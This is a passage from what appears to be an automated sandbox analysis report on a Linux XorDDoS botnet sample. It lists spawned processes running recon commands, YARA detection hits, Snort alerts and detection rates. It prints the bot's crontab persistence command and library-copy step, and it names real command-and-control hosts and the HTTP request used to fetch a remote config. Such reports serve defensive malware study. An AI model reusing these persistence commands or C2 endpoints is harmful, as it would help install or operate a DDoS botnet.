      • iJl2Sb6qRa New Fork (PID: 10772, Parent: 9452)
        • xjmgjvgxwo (PID: 10774, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo uptime 9452
      • iJl2Sb6qRa New Fork (PID: 10776, Parent: 9452)
        • xjmgjvgxwo (PID: 10780, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo uptime 9452
      • iJl2Sb6qRa New Fork (PID: 10821, Parent: 9452)
        • hazvgjwinh (PID: 10822, Parent: 3310, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh "ps -ef" 9452
      • iJl2Sb6qRa New Fork (PID: 10823, Parent: 9452)
        • hazvgjwinh (PID: 10824, Parent: 3310, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh "route -n" 9452
      • iJl2Sb6qRa New Fork (PID: 10825, Parent: 9452)
        • hazvgjwinh (PID: 10827, Parent: 3310, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh bash 9452
      • iJl2Sb6qRa New Fork (PID: 10828, Parent: 9452)
        • hazvgjwinh (PID: 10831, Parent: 10828, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh id 9452
      • iJl2Sb6qRa New Fork (PID: 10836, Parent: 9452)
        • hazvgjwinh (PID: 10840, Parent: 3310, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh "ps -ef" 9452
      • iJl2Sb6qRa New Fork (PID: 10876, Parent: 9452)
        • uriorqqkrk (PID: 10877, Parent: 3310, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 10878, Parent: 9452)
        • uriorqqkrk (PID: 10879, Parent: 10878, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk top 9452
      • iJl2Sb6qRa New Fork (PID: 10882, Parent: 9452)
        • uriorqqkrk (PID: 10884, Parent: 3310, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk pwd 9452
      • iJl2Sb6qRa New Fork (PID: 10886, Parent: 9452)
        • uriorqqkrk (PID: 10891, Parent: 10886, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk "grep \"A\"" 9452
      • iJl2Sb6qRa New Fork (PID: 10894, Parent: 9452)
        • uriorqqkrk (PID: 10896, Parent: 3310, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk id 9452
      • iJl2Sb6qRa New Fork (PID: 10931, Parent: 9452)
        • tchbigxomm (PID: 10932, Parent: 3310, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm id 9452
      • iJl2Sb6qRa New Fork (PID: 10933, Parent: 9452)
        • tchbigxomm (PID: 10935, Parent: 10933, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm "netstat -an" 9452
      • iJl2Sb6qRa New Fork (PID: 10937, Parent: 9452)
        • tchbigxomm (PID: 10938, Parent: 3310, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm "grep \"A\"" 9452
      • iJl2Sb6qRa New Fork (PID: 10939, Parent: 9452)
        • tchbigxomm (PID: 10942, Parent: 10939, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm pwd 9452
      • iJl2Sb6qRa New Fork (PID: 10946, Parent: 9452)
        • tchbigxomm (PID: 10948, Parent: 3310, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm "netstat -an" 9452
      • iJl2Sb6qRa New Fork (PID: 10986, Parent: 9452)
        • inquziyqfh (PID: 10987, Parent: 3310, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh "ifconfig eth0" 9452
      • iJl2Sb6qRa New Fork (PID: 10988, Parent: 9452)
        • inquziyqfh (PID: 10989, Parent: 3310, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh id 9452
      • iJl2Sb6qRa New Fork (PID: 10990, Parent: 9452)
        • inquziyqfh (PID: 10992, Parent: 3310, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh ls 9452
      • iJl2Sb6qRa New Fork (PID: 10993, Parent: 9452)
        • inquziyqfh (PID: 10995, Parent: 3310, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh su 9452
      • iJl2Sb6qRa New Fork (PID: 10997, Parent: 9452)
        • inquziyqfh (PID: 10999, Parent: 10997, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh top 9452
      • iJl2Sb6qRa New Fork (PID: 11041, Parent: 9452)
        • hzocakrfjc (PID: 11042, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc bash 9452
      • iJl2Sb6qRa New Fork (PID: 11043, Parent: 9452)
        • hzocakrfjc (PID: 11044, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc whoami 9452
      • iJl2Sb6qRa New Fork (PID: 11045, Parent: 9452)
        • hzocakrfjc (PID: 11047, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc gnome-terminal 9452
      • iJl2Sb6qRa New Fork (PID: 11048, Parent: 9452)
        • hzocakrfjc (PID: 11050, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc "ps -ef" 9452
      • iJl2Sb6qRa New Fork (PID: 11053, Parent: 9452)
        • hzocakrfjc (PID: 11056, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc "netstat -antop" 9452
      • iJl2Sb6qRa New Fork (PID: 11106, Parent: 9452)
        • eyvooyilzg (PID: 11107, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg "grep \"A\"" 9452
      • iJl2Sb6qRa New Fork (PID: 11108, Parent: 9452)
        • eyvooyilzg (PID: 11109, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg uptime 9452
      • iJl2Sb6qRa New Fork (PID: 11110, Parent: 9452)
        • eyvooyilzg (PID: 11111, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 11112, Parent: 9452)
        • eyvooyilzg (PID: 11113, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg pwd 9452
      • iJl2Sb6qRa New Fork (PID: 11114, Parent: 9452)
        • eyvooyilzg (PID: 11117, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg "route -n" 9452
      • iJl2Sb6qRa New Fork (PID: 11161, Parent: 9452)
        • yklepkdsai (PID: 11162, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai "netstat -an" 9452
      • iJl2Sb6qRa New Fork (PID: 11163, Parent: 9452)
        • yklepkdsai (PID: 11164, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai whoami 9452
      • iJl2Sb6qRa New Fork (PID: 11165, Parent: 9452)
        • yklepkdsai (PID: 11166, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai "ps -ef" 9452
      • iJl2Sb6qRa New Fork (PID: 11167, Parent: 9452)
        • yklepkdsai (PID: 11169, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 11170, Parent: 9452)
        • yklepkdsai (PID: 11171, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai who 9452
      • iJl2Sb6qRa New Fork (PID: 11216, Parent: 9452)
        • gacoxqlwsi (PID: 11217, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi su 9452
      • iJl2Sb6qRa New Fork (PID: 11218, Parent: 9452)
        • gacoxqlwsi (PID: 11219, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi ifconfig 9452
      • iJl2Sb6qRa New Fork (PID: 11220, Parent: 9452)
        • gacoxqlwsi (PID: 11221, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi "ls -la" 9452
      • iJl2Sb6qRa New Fork (PID: 11222, Parent: 9452)
        • gacoxqlwsi (PID: 11223, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi "ifconfig eth0" 9452
      • iJl2Sb6qRa New Fork (PID: 11224, Parent: 9452)
        • gacoxqlwsi (PID: 11226, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi ls 9452
  • cleanup
SourceRuleDescriptionAuthorStrings
iJl2Sb6qRaJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
    iJl2Sb6qRaMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
    • 0x84cfb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
    • 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6
    • 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
    • 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
    iJl2Sb6qRaLinux_Trojan_Xorddos_2aef46a6unknownunknown
    • 0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
    iJl2Sb6qRaLinux_Trojan_Xorddos_884cab60unknownunknown
    • 0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
    • 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
    SourceRuleDescriptionAuthorStrings
    /lib/libudev.soJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /lib/libudev.soMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
      • 0x84cfb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
      • 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6
      • 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
      • 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
      /lib/libudev.soLinux_Trojan_Xorddos_2aef46a6unknownunknown
      • 0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
      /lib/libudev.soLinux_Trojan_Xorddos_884cab60unknownunknown
      • 0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
      • 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
      /usr/bin/wzhmvohlxsJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        Click to see the 52 entries
        SourceRuleDescriptionAuthorStrings
        9750.1.0000000008048000.00000000080cd000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
          9750.1.0000000008048000.00000000080cd000.r-x.sdmpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
          • 0x84cfb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
          • 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6
          • 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
          • 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
          9750.1.0000000008048000.00000000080cd000.r-x.sdmpLinux_Trojan_Xorddos_2aef46a6unknownunknown
          • 0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
          9750.1.0000000008048000.00000000080cd000.r-x.sdmpLinux_Trojan_Xorddos_884cab60unknownunknown
          • 0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
          • 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
          10071.1.0000000008048000.00000000080cd000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
            Click to see the 441 entries
            Timestamp:192.168.2.2054.36.145.1064643415222020381 04/04/23-19:53:10.224062
            SID:2020381
            Source Port:46434
            Destination Port:1522
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.208.8.8.859877532021326 04/04/23-19:53:10.082524
            SID:2021326
            Source Port:59877
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.20199.59.243.22355892802021336 04/04/23-19:53:10.133352
            SID:2021336
            Source Port:55892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: iJl2Sb6qRaReversingLabs: Detection: 67%
            Source: iJl2Sb6qRaVirustotal: Detection: 66%Perma Link
            Source: /usr/bin/emnaztxelbAvira: detection malicious, Label: LINUX/Xorddos.ygevo
            Source: /usr/bin/wzhmvohlxsJoe Sandbox ML: detected
            Source: /usr/bin/cjfywultqoJoe Sandbox ML: detected
            Source: /usr/bin/emnaztxelbJoe Sandbox ML: detected
            Source: /usr/bin/zbksjhrfmsJoe Sandbox ML: detected
            Source: /usr/bin/mhvrcmaysvJoe Sandbox ML: detected
            Source: /lib/libudev.soJoe Sandbox ML: detected
            Source: /usr/bin/wdcujvrbpoJoe Sandbox ML: detected
            Source: /usr/bin/eoqlmyvucnJoe Sandbox ML: detected
            Source: /usr/bin/dezqblvxuyJoe Sandbox ML: detected
            Source: /usr/bin/hgfzmygnbxJoe Sandbox ML: detected
            Source: /usr/bin/hiueshutolJoe Sandbox ML: detected
            Source: /usr/bin/chdmwyeiiaJoe Sandbox ML: detected
            Source: /usr/bin/lnmgbribvbJoe Sandbox ML: detected
            Source: /usr/bin/ckxgqrmzxaJoe Sandbox ML: detected
            Source: /usr/bin/lsodknzppsJoe Sandbox ML: detected
            Source: iJl2Sb6qRaJoe Sandbox ML: detected
            Source: iJl2Sb6qRaMalware Configuration Extractor: XorDDoS {"C2 list": ["http://aa.hostasa.org/config.rar\u0000tat456.com:1522", "ppp.gggatat456.com:1522"]}
            Source: /tmp/iJl2Sb6qRa (PID: 9452)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

            Networking

            barindex
            Source: TrafficSnort IDS: 2021326 ET TROJAN Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) 192.168.2.20:59877 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.20:55892 -> 199.59.243.223:80
            Source: TrafficSnort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.20:46434 -> 54.36.145.106:1522
            Source: global trafficTCP traffic: 192.168.2.20:46434 -> 54.36.145.106:1522
            Source: iJl2Sb6qRa, 9451.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9454.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9457.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9462.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9552.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9563.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9574.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9585.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9596.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9607.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9618.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9629.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9640.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9651.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9662.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9673.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9684.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9695.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9706.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9717.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9728.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmpString found in binary or memory: http://aa.hostasa.org/config.rar
            Source: iJl2Sb6qRa, 9451.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9454.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9457.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9462.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9552.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9563.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9574.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9585.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9596.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9607.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9618.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9629.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9640.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9651.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9662.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9673.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9684.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9695.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9706.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9717.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9728.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmpString found in binary or memory: http://aa.hostasa.org/config.rartat456.com:1522
            Source: iJl2Sb6qRa, wzhmvohlxs.7.dr, cjfywultqo.7.dr, zbksjhrfms.7.dr, mhvrcmaysv.7.dr, libudev.so.7.dr, wdcujvrbpo.7.dr, eoqlmyvucn.7.dr, dezqblvxuy.7.dr, hgfzmygnbx.7.dr, hiueshutol.7.dr, chdmwyeiia.7.dr, lnmgbribvb.7.dr, ckxgqrmzxa.7.dr, lsodknzpps.7.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html
            Source: iJl2Sb6qRa, 9552.1.0000000008e7b000.0000000008e9c000.rw-.sdmp, iJl2Sb6qRa, 9563.1.0000000008e7b000.0000000008e9c000.rw-.sdmpString found in binary or memory: https://www.google.com
            Source: unknownDNS traffic detected: queries for: aa.hostasa.org
            Source: global trafficHTTP traffic detected: GET /config.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: aa.hostasa.orgConnection: Keep-Alive

            DDoS

            barindex
            Source: Yara matchFile source: iJl2Sb6qRa, type: SAMPLE
            Source: Yara matchFile source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
